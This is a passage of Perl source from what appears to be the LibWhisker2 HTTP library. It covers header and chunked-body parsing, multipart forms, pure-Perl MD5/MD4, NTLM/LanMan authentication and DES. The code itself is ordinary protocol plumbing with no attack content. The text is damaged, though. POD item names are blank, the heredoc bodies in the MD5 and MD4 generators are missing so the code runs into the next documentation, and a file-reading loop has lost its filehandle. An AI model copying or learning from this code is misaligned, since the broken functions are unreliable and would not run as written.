$1 !~ m/^([^:]+):([ \t]*)(.*)$/ ); $$hout{whisker}->{'abnormal_header_spacing'}++ if ( $2 ne ' ' ); $a = $1; $b = $3; $LC = lc($a); next if ( $LC eq 'whisker' ); $TE = lc($b) if ( $LC eq 'transfer-encoding' ); $CL = $b if ( $LC eq 'content-length' ); $CO = lc($b) if ( $LC eq 'connection' ); push( @{ $$hout{whisker}->{cookies} }, $b ) if ( $LC eq 'set-cookie' || $LC eq 'set-cookie2' ); if ( $$W{'lowercase_incoming_headers'} > 0 ) { $a = $LC; } elsif ( $$W{'normalize_incoming_headers'} > 0 ) { $a = ucfirst($LC); $a = 'ETag' if ( $a eq 'Etag' ); $a =~ s/(-[a-z])/uc($1)/eg; } push( @{ $$hout{whisker}->{header_order} }, $a ); if ( defined $$hout{$a} && $$W{ignore_duplicate_headers} != 1 ) { $$hout{$a} = [ $$hout{$a} ] if ( !ref( $$hout{$a} ) ); push( @{ $$hout{$a} }, $b ); } else { $$hout{$a} = $b; } } my $found = pos( $stream->{bufin} ); $$hout{whisker}->{'raw_header_data'} = substr( $stream->{bufin}, 0, $found ) if ( defined $$W{'save_raw_headers'} ); $stream->{bufin} = substr( $stream->{bufin}, $found ); return ( 1, $TE, $CL, $CO ); } ################################################################## =item B Params: $stream, \%in, \%out, $encoding, $length Return: 1 on success, 0 on error (and sets $hout->{whisker}->{error}) Read the body from the given stream, placing it in $out->{whisker}->{data}. Handles chunked encoding. Can be used to read HTTP (POST) request or HTTP response bodies. $encoding parameter should be lowercase encoding type. NOTE: $out->{whisker}->{data} is erased/cleared when this function is called, leaving {data} to just contain this particular HTTP body. =cut sub http_read_body { my ( $temp, $stream, $hin, $hout, $enc, $len ) = ( '', @_ ); my $max_size = $hin->{whisker}->{max_size} || 0; $$hout{whisker}->{data} = ''; if ( defined $enc && lc($enc) eq 'chunked' ) { my $total = 0; my $x; my $saveraw = $$hin{whisker}->{save_raw_chunks} || 0; if ( !defined( $x = _http_getline($stream) ) ) { $$hout{whisker}->{'error'} = 'Error reading chunked data length'; $stream->{'close'}->(); return 0; } $a = $x; $a =~ tr/a-fA-F0-9//cd; if ( length($a) > 8 ) { $$hout{whisker}->{'error'} = 'Chunked size is too big: ' . $x; $stream->{'close'}->(); return 0; } $len = hex($a); $len = $max_size if ( $max_size && $len > $max_size ); $$hout{whisker}->{'data'} = $x if ($saveraw); while ( $len > 0 ) { # chunked sucks if ( !defined( $temp = _http_get( $stream, $len ) ) ) { $$hout{whisker}->{'error'} = 'Error reading chunked data'; $stream->{'close'}->(); return 0; } $$hout{whisker}->{'data'} = $$hout{whisker}->{'data'} . $temp; $total += $len; if ( $max_size && $total >= $max_size ) { $stream->{'close'}->(); return 1; } $temp = _http_getline($stream); $$hout{whisker}->{'data'} .= $temp if ( $saveraw && defined $temp ); if ( defined $temp && $temp =~ /^[\r\n]*$/ ) { $temp = _http_getline($stream); $$hout{whisker}->{'data'} .= $temp if ( $saveraw && defined $temp ); } if ( !defined $temp ) { $$hout{whisker}->{'error'} = 'Error reading chunked data'; $stream->{'close'}->(); return 0; } $temp =~ tr/a-fA-F0-9//cd; if ( length($temp) > 8 ) { $$hout{whisker}->{'error'} = 'Chunked size is too big: ' . $temp; $stream->{'close'}->(); return 0; } $len = hex($temp); $len = ( $max_size - $total ) if ( $max_size && $len > ( $max_size - $total ) ); } # read in trailer headers; currently doesn't account for max_size while ( defined( $_ = _http_getline($stream) ) ) { $$hout{whisker}->{'data'} .= $_ if ($saveraw); tr/\r\n//d; last if ( $_ eq '' ); } } else { if ( defined $len ) { return 1 if ( $len <= 0 ); $len = $max_size if ( $max_size && $len > $max_size ); if ( !defined( $$hout{whisker}->{data} = _http_get( $stream, $len ) ) ) { $stream->{'close'}->(); # New LW2.5 feature: allow_short_reads will still return # success, even if all the data wasn't read. This was # per request due to some 3Com switches sending out # the wrong content-length in HTTP response my $s = $$hin{whisker}->{allow_short_reads} || 0; if ( $s != 0 && length($stream->{'bufin'}) > 0 ) { # short read is requested, and there is some data, so # copy it over and return a non-error $$hout{whisker}->{'data'} = $stream->{'bufin'}; return 1; } $$hout{whisker}->{'error'} = 'Error reading data: ' . $stream->{error}; return 0; } } else { # Yuck...read until server stops sending.... $$hout{whisker}->{data} = _http_getall( $stream, $max_size ); $stream->{'close'}->(); } $$hout{whisker}->{'data'} ||= ''; } return 1; } ################################################################## =item B Params: \%in Return: $data This function assembles the headers in the given hash into a data string. =cut sub http_construct_headers { my $hin = shift; my ( %SENT, $output, $i ); my $EOL = $hin->{whisker}->{http_eol} || "\x0d\x0a"; if ( defined $hin->{whisker}->{header_order} && ref( $hin->{whisker}->{header_order} ) eq 'ARRAY' ) { foreach ( @{ $hin->{whisker}->{header_order} } ) { next if ( $_ eq '' || $_ eq 'whisker' || !defined $hin->{$_} ); if ( ref( $hin->{$_} ) ) { utils_croak("http_construct_headers: non-array header value reference") if ( ref( $hin->{$_} ) ne 'ARRAY' ); $SENT{$_} ||= 0; my $v = $$hin{$_}->[ $SENT{$_} ]; $output .= "$_: $v$EOL"; } else { $output .= "$_: $$hin{$_}$EOL"; } $SENT{$_}++; } } foreach ( keys %$hin ) { next if ( $_ eq '' || $_ eq 'whisker' ); if ( ref( $hin->{$_} ) ) { # header with multiple values utils_croak("http_construct_headers: non-array header value ref") if ( ref( $hin->{$_} ) ne 'ARRAY' ); $SENT{$_} ||= 0; for($i=$SENT{$_}; $i<~~@{ $hin->{$_} }; $i++) { $output .= "$_: " . $hin->{$_}->[$i] . $EOL; } } else { # normal header next if ( defined $SENT{$_} ); $output .= "$_: $$hin{$_}$EOL"; } } return $output; } ################################################################## =item B Params: \%request Return: nothing This function will close any open streams for the given request. Note: in order for http_close() to find the right connection, all original host/proxy/port parameters in %request must be the exact same as when the original request was made. =cut sub http_close { my $hin = shift; my $cache_key = stream_key($hin); return if ( !defined $http_host_cache{$cache_key} ); my $stream = $http_host_cache{$cache_key}; $stream->{'close'}->(); } ################################################################## =item B Params: \%request, \%response, $timeout Return: $result This function is identical to http_do_request(), except that it wraps the entire request in a timeout wrapper. $timeout is the number of seconds to allow for the entire request to be completed. Note: this function uses alarm() and signals, and thus will only work on Unix-ish platforms. It should be safe to call on any platform though. =cut sub http_do_request_timeout { my ( $req, $resp, $timeout ) = @_; $timeout ||= 30; my $result; eval { local $SIG{ALRM} = sub { die "timeout\n" }; eval { alarm($timeout) }; $result = LW2::http_do_request( $req, $resp ); eval { alarm(0) }; }; if ($@) { $result = 1; $resp->{whisker}->{error} = 'Error with timeout wrapper'; $resp->{whisker}->{error} = 'Total transaction timed out' if ( $@ =~ /timeout/ ); } return $result; } ######################################################################## { # start md5 packaged varbs my ( @S, @T, @M ); my $code = ''; my $MD5_TRYLOADING = 1; =item B Params: $data Return: $hex_md5_string This function takes a data scalar, and composes a MD5 hash of it, and returns it in a hex ascii string. It will use the fastest MD5 function available. =cut sub md5 { return undef if ( !defined $_[0] ); # oops, forgot the data if ($MD5_TRYLOADING) { $MD5_TRYLOADING = 0; eval "require MD5"; } return MD5->hexhash( $_[0] ) if ($MD5::VERSION); my $DATA = _md5_pad( $_[0] ); &_md5_init() if ( !defined $M[0] ); return _md5_perl_generated( \$DATA ); } ######################################################################## sub _md5_init { return if ( defined $S[0] ); my $i; for ( $i = 1 ; $i <= 64 ; $i++ ) { $T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) ); } my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 ); for ( $i = 0 ; $i < 64 ; $i++ ) { $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ]; } @M = ( 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 1, 6, 11, 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 5, 8, 11, 14, 1, 4, 7, 10, 13, 0, 3, 6, 9, 12, 15, 2, 0, 7, 14, 5, 12, 3, 10, 1, 8, 15, 6, 13, 4, 11, 2, 9 ); &_md5_generate(); # check to see if it works correctly my $TEST = _md5_pad('foobar'); if ( _md5_perl_generated( \$TEST ) ne '3858f62230ac3c915f300c664312c63f' ) { utils_carp('md5: MD5 self-test not successful.'); } } ######################################################################## # This function is from Digest::Perl::MD5, and bears the following # copyrights: # # Copyright 2000 Christian Lackas, Imperia Software Solutions # Copyright 1998-1999 Gisle Aas. # Copyright 1995-1996 Neil Winton. # Copyright 1991-1992 RSA Data Security, Inc. # sub _md5_pad { my $l = length( my $msg = shift() . chr(128) ); $msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 ); $l = ( $l - 1 ) * 8; $msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 ); return $msg; } ######################################################################## sub _md5_generate { my $N = 'abcddabccdabbcda'; my ( $i, $M ) = ( 0, '' ); $M = '&0xffffffff' if ( ( 1 << 16 ) << 16 ); # mask for 64bit systems $code = < Params: $data Return: $hex_md4_string This function takes a data scalar, and composes a MD4 hash of it, and returns it in a hex ascii string. It will use the fastest MD4 function available. =cut sub md4 { return undef if ( !defined $_[0] ); # oops, forgot the data my $DATA = _md5_pad( $_[0] ); &_md4_init() if ( !defined $M[0] ); return _md4_perl_generated( \$DATA ); } ######################################################################## sub _md4_init { return if ( defined $S[0] ); my $i; my @t = ( 3, 7, 11, 19, 3, 5, 9, 13, 3, 9, 11, 15 ); for ( $i = 0 ; $i < 48 ; $i++ ) { $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ]; } @M = ( 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15, 0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15 ); my $N = 'abcddabccdabbcda'; my $M = ''; $M = '&0xffffffff' if ( ( 1 << 16 ) << 16 ); # mask for 64bit systems $code = < Params: \%multi_hash, $param_name, $param_value Return: nothing This function sets the named parameter to the given value within the supplied multipart hash. =cut sub multipart_set { my ( $hr, $n, $v ) = @_; return if ( !ref($hr) ); # error check return undef if ( !defined $n || $n eq '' ); $$hr{$n} = $v; } ######################################################################## =item B Params: \%multi_hash, $param_name Return: $param_value, undef on error This function retrieves the named parameter to the given value within the supplied multipart hash. There is a special case where the named parameter is actually a file--in which case the resulting value will be "\0FILE". In general, all special values will be prefixed with a NULL character. In order to get a file's info, use multipart_getfile(). =cut sub multipart_get { my ( $hr, $n ) = @_; return undef if ( !ref($hr) ); # error check return undef if ( !defined $n || $n eq '' ); return $$hr{$n}; } ######################################################################## =item B Params: \%multi_hash, $param_name, $file_path [, $filename] Return: undef on error, 1 on success NOTE: this function does not actually add the contents of $file_path into the %multi_hash; instead, multipart_write() inserts the content when generating the final request. =cut sub multipart_setfile { my ( $hr, $n, $path ) = ( shift, shift, shift ); my ($fname) = shift; return undef if ( !ref($hr) ); # error check return undef if ( !defined $n || $n eq '' ); return undef if ( !defined $path ); return undef if ( !( -e $path && -f $path ) ); if ( !defined $fname ) { $path =~ m/[\\\/]([^\\\/]+)$/; $fname = $1 || "whisker-file"; } $$hr{$n} = "\0FILE"; $$hr{"\0$n"} = [ $path, $fname ]; return 1; } ######################################################################## =item B Params: \%multi_hash, $file_param_name Return: $path, $name ($path=undef on error) multipart_getfile is used to retrieve information for a file parameter contained in %multi_hash. To use this you would most likely do: ($path,$fname)=LW2::multipart_getfile(\%multi,"param_name"); =cut sub multipart_getfile { my ( $hr, $n ) = @_; return undef if ( !ref($hr) ); # error check return undef if ( !defined $n || $n eq '' ); return undef if ( !defined $$hr{$n} || $$hr{$n} ne "\0FILE" ); return @{ $$hr{"\0$n"} }; } ######################################################################## =item B Params: \%multi_hash [, $new_boundary_name] Return: $current_boundary_name multipart_boundary is used to retrieve, and optionally set, the multipart boundary used for the request. NOTE: the function does no checking on the supplied boundary, so if you want things to work make sure it's a legit boundary. Libwhisker does *not* prefix it with any '---' characters. =cut sub multipart_boundary { my ( $hr, $new ) = @_; my $ret; return undef if ( !ref($hr) ); # error check if ( !defined $$hr{"\0BOUNDARY"} ) { # create boundary on the fly my $b = uc( utils_randstr(20) ); my $b2 = '-' x 32; $$hr{"\0BOUNDARY"} = "$b2$b"; } $ret = $$hr{"\0BOUNDARY"}; if ( defined $new ) { $$hr{"\0BOUNDARY"} = $new; } return $ret; } ######################################################################## =item B Params: \%multi_hash, \%request Return: 1 if successful, undef on error multipart_write is used to parse and construct the multipart data contained in %multi_hash, and place it ready to go in the given whisker hash (%request) structure, to be sent to the server. NOTE: file contents are read into the final %request, so it's possible for the hash to get *very* large if you have (a) large file(s). =cut sub multipart_write { my ( $mp, $hr ) = @_; return undef if ( !ref($mp) ); # error check return undef if ( !ref($hr) ); # error check if ( !defined $$mp{"\0BOUNDARY"} ) { # create boundary on the fly my $b = uc( utils_randstr(20) ); my $b2 = '-' x 32; $$mp{"\0BOUNDARY"} = "$b2$b"; } my $B = $$mp{"\0BOUNDARY"}; my $EOL = $$hr{whisker}->{http_eol} || "\x0d\x0a"; my $keycount = 0; foreach ( keys %$mp ) { next if ( substr( $_, 0, 1 ) eq "\0" ); $keycount++; if ( $$mp{$_} eq "\0FILE" ) { my ( $path, $name ) = multipart_getfile( $mp, $_ ); next if ( !defined $path ); $$hr{whisker}->{data} .= "$B$EOL"; $$hr{whisker}->{data} .= "Content-Disposition: " . "form-data; name=\"$_\"; "; $$hr{whisker}->{data} .= "filename=\"$name\"$EOL"; $$hr{whisker}->{data} .= "Content-Type: " . "application/octet-stream$EOL"; $$hr{whisker}->{data} .= $EOL; next if ( !open( IN, "<$path" ) ); binmode(IN); # stupid Windows while () { $$hr{whisker}->{data} .= $_; } close(IN); $$hr{whisker}->{data} .= $EOL; # WARNING: is this right? } else { $$hr{whisker}->{data} .= "$B$EOL"; $$hr{whisker}->{data} .= "Content-Disposition: " . "form-data; name=\"$_\"$EOL"; $$hr{whisker}->{data} .= "$EOL$$mp{$_}$EOL"; } } if ($keycount) { $$hr{whisker}->{data} .= "$B--$EOL"; # closing boundary $$hr{"Content-Length"} = length( $$hr{whisker}->{data} ); $$hr{"Content-Type"} = "multipart/form-data; boundary=$B"; return 1; } else { # multipart hash didn't contain params to upload return undef; } } ######################################################################## =item B Params: \%multi_hash, \%hout_response [, $filepath ] Return: 1 if successful, undef on error multipart_read will parse the data contents of the supplied %hout_response hash, by passing the appropriate info to multipart_read_data(). Please see multipart_read_data() for more info on parameters and behaviour. NOTE: this function will return an error if the given %hout_response Content-Type is not set to "multipart/form-data". =cut sub multipart_read { my ( $mp, $hr, $fp ) = @_; return undef if ( !( defined $mp && ref($mp) ) ); return undef if ( !( defined $hr && ref($hr) ) ); my $ctype = utils_find_lowercase_key( $hr, 'content-type' ); return undef if ( !defined $ctype ); return undef if ( $ctype !~ m#^multipart/form-data#i ); return multipart_read_data( $mp, \$$hr{'whisker'}->{'data'}, undef, $fp ); } ######################################################################## =item B Params: \%multi_hash, \$data, $boundary [, $filepath ] Return: 1 if successful, undef on error multipart_read_data parses the contents of the supplied data using the given boundary and puts the values in the supplied %multi_hash. Embedded files will *not* be saved unless a $filepath is given, which should be a directory suitable for writing out temporary files. NOTE: currently only application/octet-stream is the only supported file encoding. All other file encodings will not be parsed/saved. =cut sub multipart_read_data { my ( $mp, $dr, $bound, $fp ) = @_; return undef if ( !( defined $mp && ref($mp) ) ); return undef if ( !( defined $dr && ref($dr) ) ); # if $bound is undef, then we'll snag what looks to be # the first boundry from the data. if ( !defined $bound ) { if ( $$dr =~ /([-]{5,}[A-Z0-9]+)[\r\n]/i ) { $bound = $1; } else { # we didn't spot a typical boundary; error return undef; } } if ( defined $fp && !( -d $fp && -w $fp ) ) { $fp = undef; } my $line = utils_getline_crlf( $dr, 0 ); return undef if ( !defined $line ); return undef if ( index( $line, $bound ) != 0 ); my $done = 0; while ( !$done ) { $done = _multipart_read_data_part( $mp, $dr, $bound, $fp ); } return 1; } ######################################################################## sub _multipart_read_data_part { my ( $mp, $dr, $bound, $fp ) = @_; my $dispinfo = utils_getline_crlf($dr); return 1 if ( !defined $dispinfo ); return 1 if ( length($dispinfo) == 0 ); my $lcdisp = lc($dispinfo); if ( index( $lcdisp, 'content-disposition: form-data;' ) != 0 ) { return 1; } # bad disposition my ( $s, $e, $l ); $s = index( $lcdisp, 'name="', 30 ); $e = index( $lcdisp, '"', $s + 6 ); return 1 if ( $s == -1 || $e == -1 ); my $NAME = substr( $dispinfo, $s + 6, $e - $s - 6 ); $s = index( $lcdisp, 'filename="', $e ); my $FILENAME = undef; if ( $s != -1 ) { $e = index( $lcdisp, '"', $s + 10 ); return 1 if ( $e == -1 ); # puke; malformed filename $FILENAME = substr( $dispinfo, $s + 10, $e - $s - 10 ); $s = rindex( $FILENAME, '\\' ); $e = rindex( $FILENAME, '/' ); $s = $e if ( $e > $s ); $FILENAME = substr( $FILENAME, $s + 1, length($FILENAME) - $s ); } my $CTYPE = utils_getline_crlf($dr); return 1 if ( !defined $CTYPE ); $CTYPE = lc($CTYPE); if ( length($CTYPE) > 0 ) { $s = index( $CTYPE, 'content-type:' ); return 1 if ( $s != 0 ); # bad ctype line $CTYPE = substr( $CTYPE, 13, length($CTYPE) - 13 ); $CTYPE =~ tr/ \t//d; my $xx = utils_getline_crlf($dr); return 1 if ( !defined $xx ); return 1 if ( length($xx) > 0 ); } else { $CTYPE = 'application/octet-stream'; } my $VALUE = ''; while ( defined( $l = utils_getline_crlf($dr) ) ) { last if ( index( $l, $bound ) == 0 ); $VALUE .= $l; $VALUE .= "\r\n"; } substr( $VALUE, -2, 2 ) = ''; if ( !defined $FILENAME ) { # read in param $$mp{$NAME} = $VALUE; return 0; } else { # read in file $$mp{$NAME} = "\0FILE"; return 0 if ( !defined $fp ); # TODO: funky content types, like application/x-macbinary if ( $CTYPE ne 'application/octet-stream' ) { return 0; } my $rfn = lc( utils_randstr(12) ); my $fullpath = "$fp$rfn"; $$mp{"\0$NAME"} = [ undef, $FILENAME ]; return 0 if ( !open( OUT, ">$fullpath" ) ); # error opening file binmode(OUT); # stupid Windows $$mp{"\0$NAME"} = [ $fullpath, $FILENAME ]; print OUT $VALUE; close(OUT); return 0; } # if !defined $FILENAME return 0; # um, this should never be reached... } ######################################################################## =item B Params: \%multi_hash Return: @files multipart_files_list returns an array of parameter names for all the files that are contained in %multi_hash. =cut sub multipart_files_list { my ($mp) = shift; my @ret; return () if ( !( defined $mp && ref($mp) ) ); while ( my ( $K, $V ) = each(%$mp) ) { push( @ret, $K ) if ( $V eq "\0FILE" ); } return @ret; } ######################################################################## =item B Params: \%multi_hash Return: @params multipart_files_list returns an array of parameter names for all the regular parameters (non-file) that are contained in %multi_hash. =cut sub multipart_params_list { my ($mp) = shift; my @ret; return () if ( !( defined $mp && ref($mp) ) ); while ( my ( $K, $V ) = each(%$mp) ) { push( @ret, $K ) if ( $V ne "\0FILE" && substr( $K, 0, 1 ) ne "\0" ); } return @ret; } ######################################################################## ######################################################################## =item B Params: $username, $password [, $domain, $ntlm_only] Return: $ntlm_object Returns a reference to an array (otherwise known as the 'ntlm object') which contains the various informations specific to a user/pass combo. If $ntlm_only is set to 1, then only the NTLM hash (and not the LanMan hash) will be generated. This results in a speed boost, and is typically fine for using against IIS servers. The array contains the following items, in order: username, password, domain, lmhash(password), ntlmhash(password) =cut sub ntlm_new { my ( $user, $pass, $domain, $flag ) = @_; $flag ||= 0; return undef if ( !defined $user ); $pass ||= ''; $domain ||= ''; my @a = ( "$user", "$pass", "$domain", undef, undef ); my $t; if ( $flag == 0 ) { $t = substr( $pass, 0, 14 ); $t =~ tr/a-z/A-Z/; $t .= "\0" x ( 14 - length($t) ); $a[3] = des_E_P16($t); # LanMan password hash $a[3] .= "\0" x ( 21 - length( $a[3] ) ); } $t = md4( encode_unicode($pass) ); $t =~ s/([a-z0-9]{2})/sprintf("%c",hex($1))/ieg; $t .= "\0" x ( 21 - length($t) ); $a[4] = $t; # NTLM password hash &des_cache_reset(); # reset the keys hash return \@a; } ######################################################################## sub ntlm_generate_responses { my ( $obj, $chal ) = @_; return ( undef, undef ) if ( !defined $obj || !defined $chal ); return ( undef, undef ) if ( !ref($obj) ); my $x = ''; $x = des_E_P24( $obj->[3], $chal ) if ( defined $obj->[3] ); return ( $x, des_E_P24( $obj->[4], $chal ) ); } ######################################################################## =item B Params: $challenge Return: @challenge_parts Splits the supplied challenge into the various parts. The returned array contains elements in the following order: unicode_domain, ident, packet_type, domain_len, domain_maxlen, domain_offset, flags, challenge_token, reserved, empty, raw_data =cut sub ntlm_decode_challenge { return undef if ( !defined $_[0] ); my $chal = shift; my @res; @res = unpack( 'Z8VvvVVa8a8a8', substr( $chal, 0, 48 ) ); push( @res, substr( $chal, 48 ) ); unshift( @res, substr( $chal, $res[4], $res[2] ) ); return @res; } ######################################################################## sub ntlm_header { my ( $s, $h, $o ) = @_; my $l = length($s); return pack( 'vvV', 0, 0, $o - $h ) if ( $l == 0 ); return pack( 'vvV', $l, $l, $o ); } ######################################################################## =item B Params: $ntlm_obj [, $server_challenge] Return: $response ntlm_client() is responsible for generating the base64-encoded text you include in the HTTP Authorization header. If you call ntlm_client() without a $server_challenge, the function will return the initial NTLM request packet (message packet #1). You send this to the server, and take the server's response (message packet #2) and pass that as $server_challenge, causing ntlm_client() to generate the final response packet (message packet #3). Note: $server_challenge is expected to be base64 encoded. =cut sub ntlm_client { my ( $obj, $p ) = @_; my $resp = "NTLMSSP\0"; return undef if ( !defined $obj || !ref($obj) ); if ( defined $p && $p ne '' ) { # answer challenge $p =~ tr/ \t\r\n//d; $p = decode_base64($p); my @c = ntlm_decode_challenge($p); my $uu = encode_unicode( $obj->[0] ); # username $resp .= pack( 'V', 3 ); my ( $hl, $hn ) = ntlm_generate_responses( $obj, $c[7] ); # token return undef if ( !defined $hl || !defined $hn ); my $o = 64; $resp .= ntlm_header( $hl, 64, $o ); # LM hash $resp .= ntlm_header( $hn, 64, ( $o += length($hl) ) ); # NTLM hash $resp .= ntlm_header( $c[0], 64, ( $o += length($hn) ) ); # domain $resp .= ntlm_header( $uu, 64, ( $o += length( $c[0] ) ) ); # username $resp .= ntlm_header( $uu, 64, ( $o += length($uu) ) ); # workstation $resp .= ntlm_header( '', 64, ( $o += length($uu) ) ); # session $resp .= pack( 'V', $c[6] ); $resp .= $hl . $hn . $c[0] . $uu . $uu; } else { # initiate challenge $resp .= pack( 'VV', 1, 0x0000b207 ); $resp .= ntlm_header( $obj->[0], 32, 32 ); $resp .= ntlm_header( $obj->[2], 32, 32 + length( $obj->[0] ) ); $resp .= $obj->[0] . $obj->[2]; } return encode_base64( $resp, '' ); } ######################################################################## sub _ntlm_auth_callback { my ( $stream, $hi, $ho, $pflag ) = @_; my ( $ntlmobj, $header, $req_pre, $req_post, $aheader, $work, $ecode ); my ($rheader); $pflag ||= 0; if ($pflag) { $ntlmobj = $$hi{whisker}->{auth_proxy_data}; $header = 'Proxy-Authorization'; $rheader = 'proxy-authenticate'; $ecode = 407; $hi->{'Proxy-Connection'} = 'Keep-Alive'; } else { $ntlmobj = $$hi{whisker}->{auth_data}; $header = 'Authorization'; $rheader = 'www-authenticate'; $ecode = 401; $hi->{Connection} = 'Keep-Alive'; } $ho->{whisker}->{error} = 'NTLM ' . $header; $hi->{$header} = 'NTLM ' . ntlm_client($ntlmobj); my $ret = _http_do_request_ex( $stream, $hi, $ho ); return $ret if ($ret); return 200 if ( $$ho{whisker}->{code} == 200 ); return 1 if ( $$ho{whisker}->{code} != $ecode ); my $thead = utils_find_lowercase_key( $ho, $rheader ); return 1 if ( !defined $thead ); my ( $found, @auths ); if ( ref($thead) ) { @auths = @$thead; } else { push @auths, $thead; } foreach (@auths) { $found = $1 if (m/^NTLM (.+)$/); } return 1 if ( !defined $found ); $hi->{$header} = 'NTLM ' . ntlm_client( $ntlmobj, $found ); push @{ $hi->{whisker}->{header_delete_on_success} }, $header; return 0; } sub _ntlm_auth_proxy_callback { return _ntlm_auth_callback( $_[0], $_[1], $_[2], 1 ); } ######################################################################## { # start of DES local container ####################################### my $generated = 0; my $perm1 = [ 57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26, 18, 10, 2, 59, 51, 43, 35, 27, 19, 11, 3, 60, 52, 44, 36, 63, 55, 47, 39, 31, 23, 15, 7, 62, 54, 46, 38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21, 13, 5, 28, 20, 12, 4 ]; my $perm2 = [ 14, 17, 11, 24, 1, 5, 3, 28, 15, 6, 21, 10, 23, 19, 12, 4, 26, 8, 16, 7, 27, 20, 13, 2, 41, 52, 31, 37, 47, 55, 30, 40, 51, 45, 33, 48, 44, 49, 39, 56, 34, 53, 46, 42, 50, 36, 29, 32 ]; my $perm3 = [ 58, 50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20, 12, 4, 62, 54, 46, 38, 30, 22, 14, 6, 64, 56, 48, 40, 32, 24, 16, 8, 57, 49, 41, 33, 25, 17, 9, 1, 59, 51, 43, 35, 27, 19, 11, 3, 61, 53, 45, 37, 29, 21, 13, 5, 63, 55, 47, 39, 31, 23, 15, 7 ]; my $perm4 = [ 32, 1, 2, 3, 4, 5, 4, 5, 6, 7, 8, 9, 8, 9, 10, 11, 12, 13, 12, 13, 14, 15, 16, 17, 16, 17, 18, 19, 20, 21, 20, 21, 22, 23, 24, 25, 24, 25, 26, 27, 28, 29, 28, 29, 30, 31, 32, 1 ]; my $perm5 = [ 16, 7, 20, 21, 29, 12, 28, 17, 1, 15, 23, 26, 5, 18, 31, 10, 2, 8, 24, 14, 32, 27, 3, 9, 19, 13, 30, 6, 22, 11, 4, 25 ]; my $perm6 = [ 40, 8, 48, 16, 56, 24, 64, 32, 39, 7, 47, 15, 55, 23, 63, 31, 38, 6, 46, 14, 54, 22, 62, 30, 37, 5, 45, 13, 53, 21, 61, 29, 36, 4, 44, 12, 52, 20, 60, 28, 35, 3, 43, 11, 51, 19, 59, 27, 34, 2, 42, 10, 50, 18, 58, 26, 33, 1, 41, 9, 49, 17, 57, 25 ]; my $sc = [ 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1 ]; sub des_E_P16 { my ($p14) = @_; my $sp8 = [ 0x4b, 0x47, 0x53, 0x21, 0x40, 0x23, 0x24, 0x25 ]; my $p7 = substr( $p14, 0, 7 ); my $p16 = des_smbhash( $sp8, $p7 ); $p7 = substr( $p14, 7, 7 ); $p16 .= des_smbhash( $sp8, $p7 ); return $p16; } sub des_E_P24 { my ( $p21, $c8_str ) = @_; my @c8 = map { ord($_) } split( //, $c8_str ); my $p24 = des_smbhash( \@c8, substr( $p21, 0, 7 ) ); $p24 .= des_smbhash( \@c8, substr( $p21, 7, 7 ) ); $p24 .= des_smbhash( \@c8, substr( $p21, 14, 7 ) ); } sub des_permute { my ( $i, $out, $in, $p, $n ) = ( 0, @_ ); foreach $i ( 0 .. ( $n - 1 ) ) { $out->[$i] = $in->[ $p->[$i] - 1 ]; } } sub des_lshift { my ( $c, $d, $count ) = @_; my ( @outc, @outd, $i, $x ); while ( $count-- ) { push @$c, shift @$c; push @$d, shift @$d; } } my %dohash_cache; # cache for key data; saves some cycles my %key_cache; # another cache for key data sub des_cache_reset { %dohash_cache = (); %key_cache = (); } sub des_dohash { my ( $out, $in, $key ) = @_; my ( $i, $j, $k, @pk1, @c, @d, @cd, @ki, @pd1, @l, @r, @rl ); # if(!defined $dohash_cache{$skey}){ &des_permute( \@pk1, $key, $perm1, 56 ); for ( $i = 0 ; $i < 28 ; $i++ ) { $c[$i] = $pk1[$i]; $d[$i] = $pk1[ $i + 28 ]; } for ( $i = 0 ; $i < 16 ; $i++ ) { my @array; &des_lshift( \@c, \@d, $sc->[$i] ); @cd = ( @c, @d ); &des_permute( \@array, \@cd, $perm2, 48 ); $ki[$i] = \@array; # $dohash_cache{$skey}->[$i]=\@array; } # } else { # for($i=0;$i<16;$i++){ # $ki[$i]=$dohash_cache{$skey}->[$i];} # } des_dohash2( $in, \@l, \@r, \@ki ); @rl = ( @r, @l ); &des_permute( $out, \@rl, $perm6, 64 ); } sub des_str_to_key { my ($str) = @_; my ( $i, @key, $out, @str ); unshift( @str, ord($_) ) while ( $_ = chop($str) ); $key[0] = $str[0] >> 1; $key[1] = ( ( $str[0] & 0x01 ) << 6 ) | ( $str[1] >> 2 ); $key[2] = ( ( $str[1] & 0x03 ) << 5 ) | ( $str[2] >> 3 ); $key[3] = ( ( $str[2] & 0x07 ) << 4 ) | ( $str[3] >> 4 ); $key[4] = ( ( $str[3] & 0x0f ) << 3 ) | ( $str[4] >> 5 ); $key[5] = ( ( $str[4] & 0x1f ) << 2 ) | ( $str[5] >> 6 ); $key[6] = ( ( $str[5] & 0x3f ) << 1 ) | ( $str[6] >> 7 ); $key[7] = $str[6] & 0x7f; foreach $i ( 0 .. 7 ) { $key[$i] = 0xff & ( $key[$i] << 1 ); } @{ $key_cache{$str} } = @key; return \@key; } sub des_smbhash { my ( $in, $key ) = @_; my $key2; &des_generate if ( !$generated ); if ( defined $key_cache{$key} ) { $key2 = $key_cache{$key}; } else { $key2 = &des_str_to_key($key); } my ( $i, $div, $mod, @in, @outb, @inb, @keyb, @out ); foreach $i ( 0 .. 63 ) { $div = int( $i / 8 ); $mod = $i % 8; $inb[$i] = ( $in->[$div] & ( 1 << ( 7 - ($mod) ) ) ) ? 1 : 0; $keyb[$i] = ( $key2->[$div] & ( 1 << ( 7 - ($mod) ) ) ) ? 1 : 0; $outb[$i] = 0; } &des_dohash( \@outb, \@inb, 